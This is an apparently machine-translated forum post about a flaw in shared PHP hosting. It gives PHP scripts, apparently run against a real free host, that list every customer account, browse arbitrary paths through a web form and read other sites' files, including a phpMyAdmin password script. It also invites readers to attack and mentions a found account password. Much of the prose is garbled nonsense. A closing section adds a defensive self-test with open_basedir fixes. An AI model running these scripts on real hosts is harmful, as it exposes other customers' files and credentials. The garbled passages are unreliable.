A small vulnerability in paid PHP hosting space
From;    Author:Stand originally









Most paid hosting space (that can run PHP) has this problem.
Hu Yi is used as the example below:
Code:
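<?php
// Open a directory handle on /home and print every entry in it
$d = dir("/home");
echo "Handle: " . $d->handle . "<br>\n";
echo "Path: " . $d->path . "<br>\n";
// Compare against false so an entry named "0" does not end the loop
while (($entry = $d->read()) !== false) {
    echo $entry . "<br>\n";
}
$d->close();
?>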

This test.php program lists everything under /home, which reveals all users on the current 51.net host.
What can you see if you change "/home" to "/"? Go and look for yourself. Fasten too nervous. It is nervous from the back
Everything directly under HOME is a login account.
The entries under HOME/.domain and HOME/.trialdomain are all third-level domain names.
Many of the accounts have no space; they are empty. I tried repeatedly.
Each third-level domain name corresponds to one virtual host.
Examples (I dare not use Hu Yi):
http://tonylong.l1h.net/test.php
http://tonylong.l1h.net/test1.php
http://tonylong.l1h.net/test2.php
http://tonylong.l1h.net/test3.php

Use aa.php to read the source code of a file:
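<?php
// fopen() does not expand wildcards; "/home/*.*" stands for the file to read
$fd = fopen("/home/*.*", "r");
// Print the file line by line, up to 4096 bytes per read
while (($buffer = fgets($fd, 4096)) !== false) {
    echo $buffer;
}
fclose($fd);
?>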
Example, reading the source code of /home/html/phpmyadmin/user_password.php (this is a serious threat to the website): http://tonylong.l1h.net/aa.php
Use ss.php to list all files and folders under a specified directory:
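<?php
// Recursively print the files and subdirectories below $dir as nested lists
function listdir($dir) {
    echo "<ul>";
    $handle = opendir($dir);
    echo "Directory handle: $handle<br>\n";
    while (($sdir = readdir($handle)) !== false) {
        if (is_file("$dir/$sdir")) echo "<li>$dir/$sdir";
        // Skip "." and ".." so the recursion terminates
        if (is_dir("$dir/$sdir") and $sdir <> '.' and $sdir <> '..') {
            echo "<li>$dir";
            listdir("$dir/$sdir");
        }
    }
    closedir($handle);
    echo "</ul>";
}
// The original relied on register_globals to fill $dir from the form field
$dir = isset($_POST['dir']) ? $_POST['dir'] : '';
if (!empty($dir)) {
    listdir($dir);
}
?>

<form action="test.php" method="post">
Please enter the path to query: <input type="text" name="dir" size="50">
<input type="submit" value="Query">
</form>
Example: http://tonylong.l1h.net/ss.php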

The space used for the demonstration is free space at l1h.net.
Everybody fastens attack

Still have the one cycle that Perlhack makes up.
Anyway the tiger ala account that myself found me and password.
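
For a hosting operator, the scripts above double as a test case: if an account can open directories above its own tree, the leak is present. The following is an added example, not code from the original page; it reports only true/false results plus the two settings that decide the outcome, and `$accountRoot` is an assumed default to replace with the account's real home directory.

```php
<?php
// Added example: confinement self-test for one hosting account.
// It never prints directory contents, only whether a path can be opened.

// Assumption: the account owns the directory this script sits in.
$accountRoot = __DIR__;

/** Every ancestor of $root up to "/", i.e. paths outside the account. */
function ancestors($root) {
    $out = array();
    $dir = rtrim($root, '/');
    while ($dir !== '' && ($parent = dirname($dir)) !== $dir) {
        $out[] = $parent;
        $dir = $parent;
    }
    return $out;
}

/** True if opendir(), which dir() wraps, succeeds on $path. */
function can_list($path) {
    $h = @opendir($path);
    if ($h === false) return false;
    closedir($h);
    return true;
}

/** Gather the settings and probe results that decide whether the leak exists. */
function audit($accountRoot) {
    $report = array(
        'open_basedir' => (string) ini_get('open_basedir'), // '' = unrestricted
        'script_owner' => getmyuid(),                       // owner of this file
        'process_uid'  => function_exists('posix_geteuid') ? posix_geteuid() : null,
        'reachable'    => array(),
    );
    foreach (ancestors($accountRoot) as $path) {
        if (can_list($path)) $report['reachable'][] = $path;
    }
    return $report;
}

$r = audit($accountRoot);
header('Content-Type: text/plain');
echo "open_basedir: ", ($r['open_basedir'] === '' ? '(not set)' : $r['open_basedir']), "\n";
if ($r['process_uid'] !== null && $r['process_uid'] !== $r['script_owner']) {
    echo "PHP runs as uid {$r['process_uid']}, not as the account owner (uid {$r['script_owner']}).\n";
}
echo $r['reachable']
    ? "NOT confined, can open: " . implode(', ', $r['reachable']) . "\n"
    : "Confined: no directory above the account can be opened.\n";
```

If any path is reported as reachable, the usual fixes are a per-account `open_basedir` (with Apache mod_php, `php_admin_value open_basedir` in the account's virtual host) and home directories that are not readable by other users.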

